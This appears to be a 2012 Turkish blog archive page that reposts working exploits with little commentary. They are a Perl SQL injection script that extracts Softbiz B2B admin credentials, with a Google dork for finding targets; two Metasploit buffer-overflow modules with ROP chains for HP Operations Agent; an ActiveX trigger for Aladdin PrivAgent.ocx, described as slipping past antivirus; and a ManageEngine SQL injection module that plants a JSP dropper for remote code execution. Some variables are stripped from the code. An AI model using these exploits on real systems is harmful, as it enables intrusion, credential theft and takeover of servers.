Archive for 29 Ekim 2012

Softbiz B2B shopping Sql Injection Exploit (perl)

Softbiz B2B shopping Sql Injection açığı bulunmuş olup perl exploit ve açığın oluşumu şu şekilde.

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
#0     _                   __           __       __                     1 
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
#1                  \ \____/ >> Exploit database separated by exploit   0 
#0                   \/___/          type (local, remote, DoS, etc.)    1 
#1                                                                      1 
#0  [+] Site            : 1337day.com                                   0 
#1  [+] Support e-mail  : submit[at]1337day.com                         1 
#0                                                                      0 
#1               #########################################              1 
#0               I'm Caddy-dz member from Inj3ct0r Team                 1 
#1               #########################################              0 
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
 
#### 
# Exploit Title: Softbiz B2B shopping sql injection Exploit (perl) 
# Author: Caddy-Dz 
# Facebook Page: .Cyber.Army 
# E-mail:   
# Category:: webapps 
# Google Dork: inurl:buyers_subcategories.php 
# Security Risk: High 
# Tested on: Windows Seven Edition Integral / French 
#### 
# 
# Greets : 1337day Team , Exploit-ID Team , Algerian Cyber Army Team , KedAns-Dz , Kalashincov3 
# .. Kha&mix , King Of Pirates , xDZx-Team ... and all algerian hackers . 
# 
# this was written for educational purpose only. use it at your own risk. 
# author will be not responsible for any damage caused! user assumes all responsibility  
# intended for authorized web application pentesting only! 
 
 
 
 
use LWP::Simple; 
use LWP::UserAgent; 
 
system('cls'); 
system('title Softbiz B2B shopping sql injection'); 
system('color a'); 
 
 
if( < 2) 
{ 
print "[-]How To Use\n\n"; 
&help; exit(); 
} 
sub help() 
{ 
print "[+] usage1 : perl $0 site.com /path/ \n"; 
print "[+] usage2 : perl $0 site.com / \n"; 
print "[+] Note ! : do not use (http://) and make space between host and path like the exemple"; 
} 
 
print  "\n****************************************************\n"; 
print  "\n*                coded by Caddy-Dz                 *\n"; 
print  "\n*        email: islam_babia[at]hotmail.co          *\n"; 
print  "\n* Fb Page: .Cyber.Army *\n"; 
print  "\*****************************************************\n"; 
($Target, $path,$file_vuln, $sql_query,) = ; 
 
my $file_vuln = "/buyers_subcategories.php?IndustryID=-56"; 
my $sql_query = '+union+select+1,2,concat(0x23,LoginID,0x3a,Password,0x23)+from+admin--';  
my $url = "http://" . $Target . $path . $file_vuln . $sql_query; 
print "\n wait!!! \n\n"; 
 
my $request   = HTTP::Request->new(GET=>$url); 
my $useragent = LWP::UserAgent->new(); 
$useragent->timeout(10); 
my $response  = $useragent->request($request); 
if ($response->is_success) { 
my $res   = $response->content; 
if ($res =~ m/[#](.*):(.*)[#]/g) { 
my ($username,$password) = ($1,$2); 
print "[+] $username:$password \n\n"; 
} 
else { print "[-] Error, Fail to get admin login.\n\n"; } 
} 
else { print "[-] Error, ".$response->status_line."\n\n";  
}  

HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow

HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow remote exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::Tcp
        include Msf::Exploit::Remote::Seh

        def initialize
                super(
                        'Name'        => 'HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow',
                        'Description'    => %q{
                                        This module exploits a buffer overflow vulnerability in HP Operations Agent for
                                Windows. The vulnerability exists in the HP Software Performance Core Program
                                component (coda.exe) when parsing requests for the 0x8c opcode. This module has
                                been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and
                                Windows 2003 SP2 (DEP bypass).

                                The coda.exe components runs only for localhost by default, network access must be
                                granted through its configuration to be remotely exploitable. On the other hand it
                                runs on a random TCP port, to make easier reconnaissance a check function is
                                provided.
                        },
                        'Author'      => [
                                'Luigi Auriemma', # Vulnerability discovery
                                'juan vazquez' # Metasploit module
                        ],
                        'Platform'    => 'win',
                        'References'  =>
                                [
                                        [ 'CVE', '2012-2020' ],
                                        [ 'OSVDB', '83674' ],
                                        [ 'BID', '54362' ],
                                        [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-115/' ]
                                ],
                        'Payload'        =>
                                {
                                        'Space'          => 1024,
                                        'BadChars'       => "",
                                        'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500
                                        'DisableNops'    => true
                                },
                        'Targets'     =>
                                [
                                        [ 'HP Operations Agent 11.00 / Windows XP SP3',
                                                {
                                                        'Ret'    => 0x100e79eb, # ppr from OvSecCore.dll
                                                        'Offset' => 2084
                                                }
                                        ],
                                        [ 'HP Operations Agent 11.00 / Windows 2003 SP2',
                                                {
                                                        'Ret'       => 0x10073c2c, # stackpivot # ADD ESP,404 # RETN from OvSecCore.dll
                                                        'Offset'    => 2084,
                                                        'RopOffset' => 36
                                                }
                                        ]
                                ],
                        'DefaultTarget'  => 1,
                        'Privileged'     => true,
                        'DisclosureDate' => 'Jul 09 2012'
                )

        end

        def junk(n=4)
                return rand_text_alpha(n).unpack("V")[0].to_i
        end

        def nop
                return make_nops(4).unpack("V")[0].to_i
        end

        def check

                res = ping

                if not res
                        return Exploit::CheckCode::Unknown
                end

                if res !~ /HTTP\/1\.1 200 OK/
                        return Exploit::CheckCode::Unknown
                end

                if res =~ /server:.*coda 11.(\d+)/
                        minor = $1.to_i
                        if minor < 2
                                return Exploit::CheckCode::Vulnerable
                        else
                                return Exploit::CheckCode::Safe
                        end
                end

                if res =~ /server:.*coda/
                        return Exploit::CheckCode::Detected
                end

                return Exploit::CheckCode::Safe

        end

        def ping

                ping_request = <<-eos
Ping /Hewlett-Packard/OpenView/BBC/ping/ HTTP/1.1
cache-control: no-cache
connection: close
content-length: 0
content-type: application/octetstream
host: #{rhost}:#{rport}
pragma: no-cache
targetid: unknown
targeturi: http://#{rhost}:#{rport}/Hewlett-Packard/OpenView/BBC/ping/
user-agent: BBC 11.00.044; coda unknown version

                eos

                connect
                sock.put(ping_request)
                res = sock.get_once(-1, 1)
                disconnect

                return res

        end

        def exploit

                peer = "#{rhost}:#{rport}"

                print_status "#{peer} - Ping host..."
                res = ping
                if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/
                        print_error("#{peer} - Host didn't answer correctly to ping")
                        return
                end

                connect

                http_headers = <<-eos
GET /Hewlett-Packard/OpenView/Coda/ HTTP/1.1
cache-control: no-cache
content-type: application/octetstream
expect: 100-continue
host: #{rhost}:#{rport}
pragma: no-cache
targetid: unknown
targeturi: http://[#{rhost}]:#{rport}/Hewlett-Packard/OpenView/Coda/
transfer-encoding: chunked
user-agent: BBC 11.00.044;  14

                eos

                print_status("#{peer} - Sending HTTP Expect...")
                sock.put(http_headers)
                res = sock.get_once(-1, 1)
                if not res or res !~ /HTTP\/1\.1 100 Continue/
                        print_error("#{peer} - Failed while sending HTTP Expect Header")
                        return
                end

                coda_request = [
                        0x0000000e,
                        0xffffffff,
                        0x00000000,
                        0x0000008c, # Operation 0x8c
                        0x00000002,
                        0x00000002
                ].pack("N*")

                if target.name =~ /Windows XP/
                        bof = rand_text(target['Offset'])
                        bof << generate_seh_record(target.ret)
                        bof << payload.encoded
                        bof << rand_text(4000) # Allows to trigger exception
                else # Windows 2003
                        rop_gadgets =
                                [
                                        0x77bb2563, # POP EAX # RETN
                                        0x77ba1114, # <- *&VirtualProtect()
                                        0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
                                        junk,
                                        0x77bb0c86, # XCHG EAX,ESI # RETN
                                        0x77bc9801, # POP EBP # RETN
                                        0x77be2265, # ptr to 'push esp #  ret'
                                        0x77bb2563, # POP EAX # RETN
                                        0x03C0990F,
                                        0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
                                        0x77bb48d3, # POP EBX, RET
                                        0x77bf21e0, # .data
                                        0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
                                        0x77bbfc02, # POP ECX # RETN
                                        0x77bef001, # W pointer (lpOldProtect) (-> ecx)
                                        0x77bd8c04, # POP EDI # RETN
                                        0x77bd8c05, # ROP NOP (-> edi)
                                        0x77bb2563, # POP EAX # RETN
                                        0x03c0984f,
                                        0x77bdd441, # SUB EAX, 03c0940f
                                        0x77bb8285, # XCHG EAX,EDX # RETN
                                        0x77bb2563, # POP EAX # RETN
                                        nop,
                                        0x77be6591, # PUSHAD # ADD AL,0EF # RETN
                                ].pack("V*")
                        bof = Rex::Text.pattern_create(target['RopOffset'])
                        bof << rop_gadgets
                        bof << payload.encoded
                        my_payload_length =  target['RopOffset'] + rop_gadgets.length + payload.encoded.length
                        bof << rand_text(target['Offset'] - my_payload_length)
                        bof << generate_seh_record(target.ret)
                        bof << rand_text(4000) # Allows to trigger exception
                end

                coda_request << [bof.length].pack("n")
                coda_request << bof

                http_body = coda_request.length.to_s(16)
                http_body << "\x0d\x0a"
                http_body << coda_request
                http_body << "\x0d\x0a\x0d\x0a"

                print_status("#{peer} - Triggering overflow...")
                sock.put(http_body)

                disconnect
        end

end

HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow

HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow remote exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::Tcp
        include Msf::Exploit::Remote::Seh

        def initialize
                super(
                        'Name'        => 'HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow',
                        'Description'    => %q{
                                        This module exploits a buffer overflow vulnerability in HP Operations Agent for
                                Windows. The vulnerability exists in the HP Software Performance Core Program
                                component (coda.exe) when parsing requests for the 0x34 opcode. This module has
                                been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and
                                Windows 2003 SP2 (DEP bypass).

                                The coda.exe components runs only for localhost by default, network access must be
                                granted through its configuration to be remotely exploitable. On the other hand it
                                runs on a random TCP port, to make easier reconnaissance a check function is
                                provided.
                        },
                        'Author'      => [
                                'Luigi Auriemma', # Vulnerability discovery
                                'juan vazquez' # Metasploit module
                        ],
                        'Platform'    => 'win',
                        'References'  =>
                                [
                                        [ 'CVE', '2012-2019' ],
                                        [ 'OSVDB', '83673' ],
                                        [ 'BID', '54362' ],
                                        [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-114/' ]
                                ],
                        'Payload'        =>
                                {
                                        'Space'          => 1024,
                                        'BadChars'       => "",
                                        'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500
                                        'DisableNops'    => true
                                },
                        'Targets'     =>
                                [
                                        [ 'HP Operations Agent 11.00 / Windows XP SP3',
                                                {
                                                        'Ret'    => 0x100e79eb, # ppr from OvSecCore.dll
                                                        'Offset' => 2084
                                                }
                                        ],
                                        [ 'HP Operations Agent 11.00 / Windows 2003 SP2',
                                                {
                                                        'Ret'       => 0x10073c2c, # stackpivot # ADD ESP,404 # RETN from OvSecCore.dll
                                                        'Offset'    => 2084,
                                                        'RopOffset' => 36
                                                }
                                        ]
                                ],
                        'DefaultTarget'  => 1,
                        'Privileged'     => true,
                        'DisclosureDate' => 'Jul 09 2012'
                )

        end

        def junk(n=4)
                return rand_text_alpha(n).unpack("V")[0].to_i
        end

        def nop
                return make_nops(4).unpack("V")[0].to_i
        end

        def check

                res = ping

                if not res
                        return Exploit::CheckCode::Unknown
                end

                if res !~ /HTTP\/1\.1 200 OK/
                        return Exploit::CheckCode::Unknown
                end

                if res =~ /server:.*coda 11.(\d+)/
                        minor = $1.to_i
                        if minor < 2
                                return Exploit::CheckCode::Vulnerable
                        else
                                return Exploit::CheckCode::Safe
                        end
                end

                if res =~ /server:.*coda/
                        return Exploit::CheckCode::Detected
                end

                return Exploit::CheckCode::Safe

        end

        def ping

                ping_request = <<-eos
Ping /Hewlett-Packard/OpenView/BBC/ping/ HTTP/1.1
cache-control: no-cache
connection: close
content-length: 0
content-type: application/octetstream
host: #{rhost}:#{rport}
pragma: no-cache
targetid: unknown
targeturi: http://#{rhost}:#{rport}/Hewlett-Packard/OpenView/BBC/ping/
user-agent: BBC 11.00.044; coda unknown version

                eos

                connect
                sock.put(ping_request)
                res = sock.get_once(-1, 1)
                disconnect

                return res

        end

        def exploit

                peer = "#{rhost}:#{rport}"

                print_status "#{peer} - Ping host..."
                res = ping
                if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/
                        print_error("#{peer} - Host didn't answer correctly to ping")
                        return
                end

                connect

                http_headers = <<-eos
GET /Hewlett-Packard/OpenView/Coda/ HTTP/1.1
cache-control: no-cache
content-type: application/octetstream
expect: 100-continue
host: #{rhost}:#{rport}
pragma: no-cache
targetid: unknown
targeturi: http://[#{rhost}]:#{rport}/Hewlett-Packard/OpenView/Coda/
transfer-encoding: chunked
user-agent: BBC 11.00.044;  14

                eos

                print_status("#{peer} - Sending HTTP Expect...")
                sock.put(http_headers)
                res = sock.get_once(-1, 1)
                if not res or res !~ /HTTP\/1\.1 100 Continue/
                        print_error("#{peer} - Failed while sending HTTP Expect Header")
                        return
                end

                coda_request = [
                        0x0000000e,
                        0xffffffff,
                        0x00000000,
                        0x00000034, # Operation 0x8c
                        0x00000002,
                        0x00000002
                ].pack("N*")

                if target.name =~ /Windows XP/
                        bof = rand_text(target['Offset'])
                        bof << generate_seh_record(target.ret)
                        bof << payload.encoded
                        bof << rand_text(4000) # Allows to trigger exception
                else # Windows 2003
                        rop_gadgets =
                                [
                                        0x77bb2563, # POP EAX # RETN
                                        0x77ba1114, # <- *&VirtualProtect()
                                        0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
                                        junk,
                                        0x77bb0c86, # XCHG EAX,ESI # RETN
                                        0x77bc9801, # POP EBP # RETN
                                        0x77be2265, # ptr to 'push esp #  ret'
                                        0x77bb2563, # POP EAX # RETN
                                        0x03C0990F,
                                        0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
                                        0x77bb48d3, # POP EBX, RET
                                        0x77bf21e0, # .data
                                        0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
                                        0x77bbfc02, # POP ECX # RETN
                                        0x77bef001, # W pointer (lpOldProtect) (-> ecx)
                                        0x77bd8c04, # POP EDI # RETN
                                        0x77bd8c05, # ROP NOP (-> edi)
                                        0x77bb2563, # POP EAX # RETN
                                        0x03c0984f,
                                        0x77bdd441, # SUB EAX, 03c0940f
                                        0x77bb8285, # XCHG EAX,EDX # RETN
                                        0x77bb2563, # POP EAX # RETN
                                        nop,
                                        0x77be6591, # PUSHAD # ADD AL,0EF # RETN
                                ].pack("V*")
                        bof = Rex::Text.pattern_create(target['RopOffset'])
                        bof << rop_gadgets
                        bof << payload.encoded
                        my_payload_length =  target['RopOffset'] + rop_gadgets.length + payload.encoded.length
                        bof << rand_text(target['Offset'] - my_payload_length)
                        bof << generate_seh_record(target.ret)
                        bof << rand_text(4000) # Allows to trigger exception
                end

                coda_request << [bof.length].pack("n")
                coda_request << bof

                http_body = coda_request.length.to_s(16)
                http_body << "\x0d\x0a"
                http_body << coda_request
                http_body << "\x0d\x0a\x0d\x0a"

                print_status("#{peer} - Triggering overflow...")
                sock.put(http_body)

                disconnect
        end

end

Aladdin Knowledge System Ltd – PrivAgent.ocx ChooseFilePath BOF

Antivirüslerce Yutulmaktadır.

 <object id="pwnd" classid="clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6"></object>

ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection

ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection açığı bulundu.
Açığı ilişkin Exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::Remote::HttpClient
        include Msf::Exploit::EXE

        def initialize(info={})
                super(update_info(info,
                        'Name'           => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",
                        'Description'    => %q{
                                        This module exploits a SQL injection found in ManageEngine Security Manager Plus
                                advanced search page, which results in remote code execution under the context of
                                SYSTEM in Windows; or as the user in Linux.  Authentication is not required in order
                                to exploit this vulnerability.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'xistence <xistence[at]0x90.nl>',  # Discovery & Metasploit module
                                        'sinn3r',                          # Improved Metasploit module
                                        'egypt'                            # Improved Metasploit module
                                ],
                        'References'     =>
                                [
                                        ['EDB','22094'],
                                        ['BID', '56138']
                                ],
                        'Platform'       => ['win', 'linux'],
                        'Targets'        =>
                                [
                                        ['Automatic', {}],
                                        ['Windows',   { 'Arch' => ARCH_X86, 'Platform' => 'win'   }],
                                        ['Linux',     { 'Arch' => ARCH_X86, 'Platform' => 'linux' }]
                                ],
                        'DefaultTarget'  => 0,
                        'Privileged'     => false,
                        'DisclosureDate' => "Oct 18 2012"))

                register_options(
                        [
                                OptPort.new('RPORT', [true, 'The target port', 6262])
                        ], self.class)
        end


        def check
                res = sqli_exec(Rex::Text.rand_text_alpha(1))

                if res and res.body =~ /Error during search/
                        return Exploit::CheckCode::Appears
                else
                        return Exploit::CheckCode::Safe
                end
        end


        def pick_target
                return target if target.name != 'Automatic'

                rnd_num   = Rex::Text.rand_text_numeric(1)
                rnd_fname = Rex::Text.rand_text_alpha(5) + ".txt"
                outpath   = "../../webapps/SecurityManager/#{rnd_fname}"

                 << outpath

                sqli  = "#{rnd_num})) union select @,"
                sqli << (2..28).map {|e| e} * ","
                sqli << " into outfile \"#{outpath}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
                sqli_exec(sqli)

                res = send_request_raw({'uri'=>"/#{rnd_fname}"})

                # What @ returns:
                # Linux   = 5.0.36-enterprise
                # Windows = 5.0.36-enterprise-nt

                if res and res.body =~ /\d\.\d\.\d\d\-enterprise\-nt/
                        print_status("#{rhost}:#{rport} - Target selected: #{targets[1].name}")
                        return targets[1]  # Windows target
                elsif res and res.body =~ /\d\.\d\.\d\d\-enterprise/
                        print_status("#{rhost}:#{rport} - Target selected: #{targets[2].name}")
                        return targets[2]
                end

                return nil
        end


        #
        # We're in SecurityManager/bin at this point
        #
        def on_new_session(cli)
                if target['Platform'] == 'linux'
                        print_warning("Malicious executable is removed during payload execution")
                end

                if cli.type == 'meterpreter'
                        cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
                end

                .each { |f|
                        base = File.basename(f)
                        f = "../webapps/SecurityManager/#{base}"
                        print_warning("#{rhost}:#{rport} - Deleting: \"#{base}\"")

                        begin
                                if cli.type == 'meterpreter'
                                        cli.fs.file.rm(f)
                                else
                                        del_cmd = (['Platform'] == 'linux') ? 'rm' : 'del'
                                        f = f.gsub(/\//, '\\') if ['Platform'] == 'win'
                                        cli.shell_command_token("#{del_cmd} \"#{f}\"")
                                end

                                print_good("#{rhost}:#{rport} - \"#{base}\" deleted")
                        rescue ::Exception => e
                                print_error("Unable to delete: #{e.message}")
                        end
                }
        end


        #
        # Embeds our executable in JSP
        #
        def generate_jsp_payload
                opts                = {:arch => .arch, :platform => .platform}
                native_payload      = Rex::Text.encode_base64(generate_payload_exe(opts))
                native_payload_name = Rex::Text.rand_text_alpha(rand(6)+3)
                ext                 = (['Platform'] == 'win') ? '.exe' : '.bin'

                var_raw     = Rex::Text.rand_text_alpha(rand(8) + 3)
                var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3)
                var_buf     = Rex::Text.rand_text_alpha(rand(8) + 3)
                var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
                var_tmp     = Rex::Text.rand_text_alpha(rand(8) + 3)
                var_path    = Rex::Text.rand_text_alpha(rand(8) + 3)
                var_proc2   = Rex::Text.rand_text_alpha(rand(8) + 3)

                if ['Platform'] == 'linux'
                        var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
                        chmod = %Q|
                        Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
                        Thread.sleep(200);
                        |

                        var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
                        cleanup = %Q|
                        Thread.sleep(200);
                        Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
                        |
                else
                        chmod   = ''
                        cleanup = ''
                end

                jsp = %Q|
                <% import="java.io.*"%>
                <% import="sun.misc.BASE64Decoder"%>

                <%
                byte[] #{var_raw} = null;
                BufferedOutputStream #{var_ostream} = null;
                try {
                        String #{var_buf} = "#{native_payload}";

                        BASE64Decoder #{var_decoder} = new BASE64Decoder();
                        #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());

                        File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
                        String #{var_path} = #{var_tmp}.getAbsolutePath();

                        #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path}));
                        #{var_ostream}.write(#{var_raw});
                        #{var_ostream}.close();
                        #{chmod}
                        Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
                        #{cleanup}
                } catch (Exception e) {
                }
                %>
                |

                jsp = jsp.gsub(/\n/, '')
                jsp = jsp.gsub(/\t/, '')

                jsp.unpack("H*")[0]
        end

        def sqli_exec(sqli_string)
                cookie  = 'STATE_COOKIE=&'
                cookie << 'SecurityManager/ID/174/HomePageSubDAC_LIST/223/SecurityManager_CONTENTAREA_LIST/226/MainDAC_LIST/166&'
                cookie << 'MainTabs/ID/167/_PV/174/selectedView/Home&'
                cookie << 'Home/ID/166/PDCA/MainDAC/_PV/174&'
                cookie << 'HomePageSub/ID/226/PDCA/SecurityManager_CONTENTAREA/_PV/166&'
                cookie << 'HomePageSubTab/ID/225/_PV/226/selectedView/HomePageSecurity&'
                cookie << 'HomePageSecurity/ID/223/PDCA/HomePageSubDAC/_PV/226&'
                cookie << '_REQS/_RVID/SecurityManager/_TIME/31337; '
                cookie << '2RequestsshowThreadedReq=showThreadedReqshow; '
                cookie << '2RequestshideThreadedReq=hideThreadedReqhide;'

                state_id = Rex::Text.rand_text_numeric(5)

                send_request_cgi({
                        'method'    => 'POST',
                        'uri'       => "/STATE_ID/#{state_id}/jsp/xmlhttp/persistence.jsp",
                        'headers'   => {
                                'Cookie' => cookie,
                                'Accept-Encoding' => 'identity'
                        },
                        'vars_get'  => {
                                'reqType'    =>'AdvanceSearch',
                                'SUBREQUEST' =>'XMLHTTP'
                        },
                        'vars_post' => {
                                'ANDOR'       => 'and',
                                'condition_1' => 'OpenPorts',
                                'operator_1'  => 'IN',
                                'value_1'     => sqli_string,
                                'COUNT'       => '1'
                        }
                })
        end

        #
        # Run the actual exploit
        #
        def inject_exec(out)
                hex_jsp = generate_jsp_payload
                rnd_num = Rex::Text.rand_text_numeric(1)
                sqli  = "#{rnd_num})) union select 0x#{hex_jsp},"
                sqli << (2..28).map {|e| e} * ","
                sqli << " into outfile \"#{out}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"

                print_status("#{rhost}:#{rport} - Trying SQL injection...")
                sqli_exec(sqli)

                fname = "/#{File.basename(out)}"
                print_status("#{rhost}:#{rport} - Requesting #{fname}")
                send_request_raw({'uri' => fname})

                handler
        end


        def exploit
                # This is used to collect files we want to delete later
                 = []

                 = pick_target
                if .nil?
                        print_error("#{rhost}:#{rport} - Unable to select a target, we must bail.")
                        return
                end

                jsp_name  = rand_text_alpha(rand(6)+3)
                outpath   = "../../webapps/SecurityManager/#{jsp_name + '.jsp'}"

                 << outpath

                inject_exec(outpath)
        end
end